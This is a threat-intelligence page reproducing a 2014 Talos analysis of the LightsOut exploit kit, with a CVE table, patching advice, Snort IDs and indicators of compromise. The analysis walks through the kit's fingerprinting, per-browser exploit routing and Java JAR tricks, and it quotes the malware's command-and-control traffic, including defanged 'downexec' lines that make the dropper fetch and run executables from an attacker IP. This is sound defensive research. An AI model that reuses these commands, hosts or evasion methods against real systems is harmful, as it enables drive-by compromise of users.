Continued analysis of the LightsOut Exploit Kit
Vulnerabilities mentionedAll →
| CVE | Vulnerability | CVSS | EPSS | Flags | Affected | Exposure | Published |
|---|---|---|---|---|---|---|---|
| CVE-2012-1723 | Remote Arbitrary Code Execution in Oracle Java SE (Hotspot Component) Oracle Java SE's Java Runtime Environment contains an unspecified flaw in its Hotspot component that allows remote attackers to affect confidentiality, integrity, and availability — characterized by CISA as arbitrary code execution. The available data does not document the exact trigger beyond 'unknown vectors related to Hotspot,' but flaws in the JVM's execution engine of this type are typically reached remotely by having the runtime process malicious Java content. A successful attacker gains code execution in the context of the process running the JVM, taking control of the affected host. Any deployment running affected, unpatched Oracle Java SE — particularly legacy JRE installs — is affected. The vulnerability is in CISA's Known Exploited Vulnerabilities catalog (added 2022-03-03) with known ransomware use and a 93.7% EPSS probability of exploitation in the next 30 days, confirming active in-the-wild exploitation, though the reviewed data lists no public PoC. Do: Per CISA's required action, apply updates per vendor instructions: upgrade every Oracle Java SE installation to a currently supported patched release and inventory for legacy JRE builds that predate the 2012 Hotspot fix. Disable or restrict the Java browser plugin where it is not needed, and given known ransomware use, prioritize legacy Java systems for patching and threat-hunting. | — | 94% | KEV ransomware |
| mass≈ millions of endpoints running legacy, unpatched Java (exact count unknown) | |
| CVE-2013-1347 | Memory corruption RCE in Microsoft Internet Explorer CVE-2013-1347 is a memory-corruption vulnerability in Microsoft Internet Explorer (listed under CWE-94, code injection) that corrupts memory in a way that allows an attacker to execute arbitrary code in the security context of the logged-on user. The flaw is triggered remotely through Internet Explorer, typically by luring a user to attacker-controlled web content; related threat-intelligence coverage ties it to the LightsOut Exploit Kit used in APT28 (Pawn Storm) campaigns and to Microsoft's Update Tuesday release for IE 8. Successful exploitation yields code execution with the current user's privileges, meaning full system compromise on accounts with administrative rights. Any environment where users browse with the affected Internet Explorer versions is exposed — CISA lists 'Microsoft Internet Explorer' without enumerating a version range, while related vendor coverage highlights an IE 8 update, putting legacy Windows estates still running IE 8-era browsers at highest risk. Exploitation is confirmed in the wild: the CVE was added to CISA KEV on 2022-03-03 and carries a 77.9% EPSS (100th percentile), although ransomware use is unknown and no standalone public PoC is listed. Do: Apply Microsoft's Internet Explorer updates per vendor instructions (the CISA-required action), prioritizing this KEV-listed vulnerability. Inventory legacy Windows systems still running IE 8-era browsers and either migrate those users to a supported browser or restrict untrusted web browsing from those systems, since this is a drive-by browser exploit that executes with the current user's privileges. Verify patch levels across all IE versions in the estate rather than assuming updates propagated. | — | 78% | KEV |
| mass≈ hundreds of millions of endpoints/users at the time of disclosure, with residual exposure concentrated in legacy IE 8-era estates today | |
| CVE-2013-2423 | Remote Integrity-Affecting Vulnerability in Oracle JRE HotSpot (CVE-2013-2423) An unspecified vulnerability in the HotSpot component of Oracle's Java Runtime Environment (JRE) can be triggered remotely, allowing attackers to affect the integrity of the affected system. Oracle did not publish technical detail for the flaw, so defenders should treat unpatched legacy JRE deployments as potentially exposed without being able to precisely scope the trigger. An attacker who successfully exploits it gains the ability to tamper with the target's integrity; related reporting around the LightsOut Exploit Kit and compromised websites suggests Java flaws of this era were used in drive-by web attacks. Any endpoint or server running an unpatched Oracle JRE is affected, with legacy Java installations that never received current updates being the most likely remaining targets. The vulnerability was added to CISA's Known Exploited Vulnerabilities catalog on 2022-05-25, and EPSS assigns it an 85.3% probability of exploitation within 30 days (100th percentile), though no public proof-of-concept is catalogued and ransomware use is unknown. Do: Apply Oracle's Java updates immediately per CISA's required action: upgrade all JRE installations to a currently supported release, at minimum incorporating the April 2013 Oracle Critical Patch Update that addressed this flaw. Inventory endpoints and servers for legacy JRE installs, remove or disable the Java browser plugin where it is not required, and watch for drive-by exploit kit activity (e.g., LightsOut) as an indicator of exposure. | — | 85% | KEV |
| masshundreds of millions of endpoints (Java's historical install base), of which the remaining unpatched legacy subset is likely tens of thousands to millions of… | |
| CVE-2013-2465 | Unspecified Flaw in Oracle Java SE 2D Component Exploited in the Wild (CVE-2013-2465) CVE-2013-2465 is an unspecified vulnerability in the Java Runtime Environment (JRE) component of Oracle Java SE, located in the 2D graphics/rendering subsystem. It is triggered via unknown vectors related to 2D, typically when a hostile applet or application causes the JRE to process crafted graphical content. An attacker who successfully exploits it can affect confidentiality, integrity, and availability, which in practice means remote compromise of the affected system without user credentials. Any deployment of Oracle Java SE — end-user desktops with the browser plugin and servers running JRE releases current at the time of the June 2013 Oracle Critical Patch Update — is affected. Exploitation is confirmed in the wild: the flaw was added to CISA's Known Exploited Vulnerabilities catalog on 2022-03-28 with known ransomware use, EPSS assigns it a 98.7% probability of exploitation within 30 days (top percentile), and related 2013-era reporting around exploit kits such as LightsOut documents the era's heavy exploit-kit targeting of Java. Do: Apply the June 2013 Oracle Java SE Critical Patch Update, or any later supported Java SE release, per vendor instructions as CISA requires. Audit environments for legacy JRE installs and enabled Java browser plugin/applet support — especially on user-facing and internet-exposed legacy servers — and remove or upgrade them. Because CISA lists known ransomware use, prioritize patching external-facing and end-user systems. | — | 99% | KEV ransomware |
| masshundreds of millions of endpoints at the time of 2013 disclosure; today, a residual population of legacy Java deployments of unknown size |
Indicators of compromiseauto-extracted · verify before use · export allAll →
| Type | Indicator | Context |
|---|---|---|
| ipv4 | 93.171.216.118 | 58b86dac332a03629fc91095a4c7841b559da/analysis/ C&C Server: 93.171.216.118 IP Address hosting malware: 93.188.161.235 Secondary droppe |
| ipv4 | 93.188.161.235 | sis/ C&C Server: 93.171.216.118 IP Address hosting malware: 93.188.161.235 Secondary dropped malware sample sha256 hashes: 1218d79fca1 |
| sha1 | 334eeaf5ea3920b612b4e26bbe3e0cccbc431c2e | trator\Application Data\ Broker services\plugs\mmc.exe SHA: 334eeaf5ea3920b612b4e26bbe3e0cccbc431c2e SHA256: 5ee0761f5eda01985d5f93a5e50a1247fb5c17deba1d471b05f |
| sha1 | d667833e4915c385321b553785732bbed3009c2a | rst stage dropper: - initially dropped as ntsys391.exe SHA: D667833E4915C385321B553785732BBED3009C2A SHA256: 164de09635532bb0a4fbe25ef3058b86dac332a03629fc91095 |
| sha256 | 1218d79fca1aca48e13a5e6e582cdc5c4d24c3367328c56d61d975a757509335 | 188.161.235 Secondary dropped malware sample sha256 hashes: 1218d79fca1aca48e13a5e6e582cdc5c4d24c3367328c56d61d975a757509335 fl.jpg ac9294849559c94d5e85cb113ce8ca61bca2e576a97a9e81f663 |
| sha256 | 164de09635532bb0a4fbe25ef3058b86dac332a03629fc91095a4c7841b559da | First stage dropper: VT: https://www.virustotal.com/en/file/164de09635532bb0a4fbe25ef3058b86dac332a03629fc91095a4c7841b559da/analysis/ C&C Server: 93.171.216.118 IP Address hosting mal |
| sha256 | 5ee0761f5eda01985d5f93a5e50a1247fb5c17deba1d471b05fc09751d09a08e | c94d5e85cb113ce8ca61bca2e576a97a9e81f66321496ddada61 tl.jpg 5ee0761f5eda01985d5f93a5e50a1247fb5c17deba1d471b05fc09751d09a08e shot.jpg a26f3225aa7e7b5263033dee682153fb7a4332429782c5755a |
| sha256 | a26f3225aa7e7b5263033dee682153fb7a4332429782c5755a9eaebe8a5df095 | 985d5f93a5e50a1247fb5c17deba1d471b05fc09751d09a08e shot.jpg a26f3225aa7e7b5263033dee682153fb7a4332429782c5755a9eaebe8a5df095 inf.jpg JavaScript IDS evasion methods: Sample encoded stri |
| sha256 | ac9294849559c94d5e85cb113ce8ca61bca2e576a97a9e81f66321496ddada61 | ca48e13a5e6e582cdc5c4d24c3367328c56d61d975a757509335 fl.jpg ac9294849559c94d5e85cb113ce8ca61bca2e576a97a9e81f66321496ddada61 tl.jpg 5ee0761f5eda01985d5f93a5e50a1247fb5c17deba1d471b05fc |
| url | http://93.188.161[ | ed by a ; character, and trivally defanged) work:3|downexec hxxp://93.188.161[.]235/check2/muees27jxt/shot.jpg; work:5|downexec hxxp://93. |
Full article1,265 words · extracted from blog.talosintelligence.com · click to collapse
Friday, May 2, 2014 13:24
At the end of March, we disclosed the coverage of an Exploit Kit we called “Hello”: http://blog.talosintel.com/2014/03/hello-new-exploit-kit.html, or “LightsOut”, we thought we’d do a follow up post to tear this exploit kit apart a bit more. This variant of the LightsOut exploit kit uses a number of Java vulnerabilities, and targets multiple browsers. The primary goal is to drop & execute a downloader executable, which in turn downloads and executes more malware samples. These secondary malware samples are run in a sequence, and do some information harvesting, and potentially exfiltrate the information harvested. Overall, not fun for visitors to sites compromised with the LightsOut exploit kit.
Because of the number of Java vulnerabilities leveraged by this kit; it's important to keep Java updated, and make certain that outdated versions of Java aren't still sticking around on your PC. You can download a utility from Oracle to remove outdated versions of Java, referenced by this article:
https://www.java.com/en/download/faq/uninstaller_toolinfo.xml. A detailed analysis on how the kit operates is below, under Browser Trajectory Analysis.
Java CVEs: CVE-2013-2465 - Incorrect image channel verification (buffered image) CVE-2012-1723 - Classloader vulnerablity
CVE-2013-2423 - Java Security Prompt / Warning bypass
Microsoft Internet Explorer CVEs:
CVE-2013-1347 - CGenericElement Object Use-After-Free Vulnerability
CVE-XXXX-XXXX - Pending verification of another heap spray leveraging a use-after-free
Browsers explicitly targeted: Chrome, Internet Explorer
Snort SIDs that should catch parts of this kit:
SIDs: 26569 through 26572, 26603 and 26668
- VT: https://www.virustotal.com/en/file/164de09635532bb0a4fbe25ef3058b86dac332a03629fc91095a4c7841b559da/analysis/ C&C Server: 93.171.216.118
IP Address hosting malware: 93.188.161.235
Secondary dropped malware sample sha256 hashes: - 1218d79fca1aca48e13a5e6e582cdc5c4d24c3367328c56d61d975a757509335 fl.jpg
- ac9294849559c94d5e85cb113ce8ca61bca2e576a97a9e81f66321496ddada61 tl.jpg
- 5ee0761f5eda01985d5f93a5e50a1247fb5c17deba1d471b05fc09751d09a08e shot.jpg
- a26f3225aa7e7b5263033dee682153fb7a4332429782c5755a9eaebe8a5df095 inf.jpg JavaScript IDS evasion methods:
- Sample encoded string (remove all digits) from JavaScript"836f4974362o65679305r82637150N61617044a77736359m99323481e9388" becomes "forName"
Browser Trajectory Analysis
Stage 1: dtsrc.php - detect installed fonts, direct to 1st stage of exploits via IFRAME The first stage leverages a holdover technique from the Internet Explorer 6 era – the HtmlDlgSafeHelper ActiveX control; to check if a list of over 700 fonts are available to the browser. This is entirely unrelated to any compromise method, but may be a method of "fingerprinting" the installed version and language packs of Windows + Internet Explorer, based on available fonts. The list of found fonts is concatenated together, MD5 hashed, and the hash is submitted to the malicious site.
Stage 2: dtsrc.php?a=h1 - plugin detection javascript, direction to individual exploits based on browser + plugins dtsrc.php?a=h1 has JavaScript that detects the environment in the browser to determine which exploits to direct the browser to. The JavaScript is obfuscated and minified (placed all on one line -- use a beautifier utility, or something like http://jsbeautifier.org for an online version)
- In-lines PluginDetect JS library from http://www.pinlady.net/PluginDetect/
- Interesting: has unused/commented-out code for detecting Microsoft SharePoint plugins. All of the exploits are called by dynamically appending an <IFRAME> tag to the document, pointing to one of the exploit URLs. This is the common IFRAME function leveraged by the dtsrc,php?a=h1 page.

Here’s the unused detection routine for SharePoint — this may be an incomplete attempt to exploit the MS13-080 Microsoft Internet Explorer CDisplayPointer Use-After-Free vulnerability.

Browser compromise flow:
IE 7 on XP ––> h5 exploit page, then:
- Java 6 update <= 32 = h7 exploit page
- OR
- Java 7 update <= 17 = h2 exploit page


IE 8 on XP ––> h6 exploit page, then:
- Java 6 update <= 32 = h7 exploit page
- OR
- Java 7 update <= 17 = h2 exploit page

IE 6 on XP ––> h4 exploit page, then:
- Java 6 update <= 32 = h7 exploit page
- OR
- Java 7 update <= 17 = h2 exploit page

Chrome on Windows ––> Java 7 update <= 7 = h3 exploit page

Any browser ––> Java 6 update <= 32 = h7 exploit page (see above screenshot)
- OR Java 7 update <= 17 = h2 exploit page
Stage 3: dtsrc.php?a={??} where {??} is one of the h2/h3 etc below
h2 == Java 7 update <= 17 CVE-2013-2423
- This uses a base64 encoded JNLP with applet parameter __applet_ssv_validated=true for the CVE-2013-2423 warning bypass
- Loads the r2 JAR for downloading the dropper

And if we base64 decode the jnlp_embedded parameter, here’s the warning dialog bypas:

h3 == Chrome w/ Java 7 update <= 17 CVE-2013-2423
- Nearly exactly the same as h2 page, the JNLP is encoded/presented differently.
- Uses deployJava.js from java.com; deployJava.runApplet(
- Loads the r2 JAR for downloading the dropper

And it’s the exact same base64 encoded JNLP from H2.
h4 & h5 == Microsoft Internet Explorer 6 and Windows XP
- Heap Spray w/ DOM use-after-free vulnerability - we have ongoing research to determine exactly which CVE it is.

h6 == Microsoft Internet Explorer 8 and Windows XP
- CVE-2013-1347 - CGenericElement Object Use-After-Free Vulnerability
- Snort SIDs: 26569 through 26572, 26603 and 26668
- The code on the page is pretty much a direct rip-off of the metsploit ie_cgenericelement_uaf.rb module
- https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb
h7 == Java 6 update <= 32
- Direct <applet> loading of r7 JAR, which leverages the CVE-2012-1723 classloader confusion vulnerability
Java JAR Analysis
r2 jar - CVE-2013-2465
- CVE-2013-2465 is the Incorrect image channel verification (buffered image) vulnerability, which permits execution of arbitrary code.
- Java class grants itself full permissions via overloading java.security.AllPermission
- Ultimately downloads to disk and executes an executable (ntsys391.exe). This JAR has a pretty simple IDS evasion technique where it decodes the URL to download the executable at runtime, through simple XOR routine.

r7 jar - CVE-2012-1723
- This exploits the getClassLoader vulnerability - by modifying a class file by hand, you can confuse the Java runtime between a static variable and an instance variable. This results in code being executed outside of the java sandbox, when it hasn't been verified as safe.
- A Java class grants itself full permissions via overloading java.security.AllPermission
- One of the malicious classes in the JAR has another class embedded as a string that gets decoded and executed directly (r7-embedded.class, below)
r7-embedded.class
- This leverages java.security.PrivilegedExceptionAction
- When successful, it downloads an executable from a hardcoded url to the Java temp dir, and saves the file as ntsys391.exe. The hard-coded URL is the same .php file as the rest of the exploit kit including the fully qualified domain name. This may mean the exploit kit is rebuilt for each compromised host, or the r7 jar is dynamically built for each request by PHP.

Stage 4 - the dropped executable - which is a dropper as well
- Either one of the Java vulnerabilities or the heap spray in Microsoft Internet Explorer requests dtsrc.php?a=dwe, which is saved to disk as ntsys391.exe
- ntsys391.exe downloads additional executables, the .jpg URLs referenced below under “Network Indicators”
Host Indicators
- First stage dropper: - initially dropped as ntsys391.exe
- SHA: D667833E4915C385321B553785732BBED3009C2A
- SHA256: 164de09635532bb0a4fbe25ef3058b86dac332a03629fc91095a4c7841b559da
- Copies/Renames self as C:\Documents and Settings\Administrator\Application Data\ Broker services\WbemMonitor .exe
- Runs self: "WbemMonitor .exe -fst”
- Phones home to C2 w/ a POST request (see “Network Indicators” below) to retrieve other executables to download.
- Retrieves shot.jpg, which is actually an EXE -> C:\Documents and Settings\Administrator\Application Data\ Broker services\plugs\mmc.exe
- SHA: 334eeaf5ea3920b612b4e26bbe3e0cccbc431c2e
- SHA256: 5ee0761f5eda01985d5f93a5e50a1247fb5c17deba1d471b05fc09751d09a08e
Network Indicators
- Contacts
- 93.171.216.118
- Request: (Analyst Note: notice — no User-Agent header, HTTP/1.1 to a dotted quad)
- POST /check_value.php HTTP/1.1
- Content-Type: application/x-www-form-urlencoded
- Host: 93.171.216.118
- Content-Length: 42
- Connection: Keep-Alive
- Cache-Control: no-cache
- Post Body:
- identifiant=51032_2161380123730&version=2.
- Response: (Analyst Note: broken apart for readability - this was originally all on one line - lines delimited by a ; character, and trivally defanged)
- work:3|downexec hxxp://93.188.161[.]235/check2/muees27jxt/shot.jpg;
- work:5|downexec hxxp://93.188.161[.]235/check2/muees27jxt/tl.jpg;
- work:7|downexec hxxp://93.188.161[.]235/check2/muees27jxt/fl.jpg;
- work:290|downexec hxxp://93.188.161[.]235/check2/muees27jxt/inf.jpg;
- 93.188.161.235
- Request (Analyst Note: this kit only returns the JPG if the user-agent matches the string below, HTTP/1.1 to a dotted quad)
- GET /check2/muees27jxt/shot.jpg HTTP/1.1
- User-Agent: User-Agent: Opera/10.35 Presto/2.2.30
- Host: 93.188.161.235
- Cache-Control: no-cache
- Response:
- PE executable
Text extracted automatically; images, tables and formatting may be missing. Original: https://blog.talosintelligence.com/continued-analysis-of-lightsout-exploit/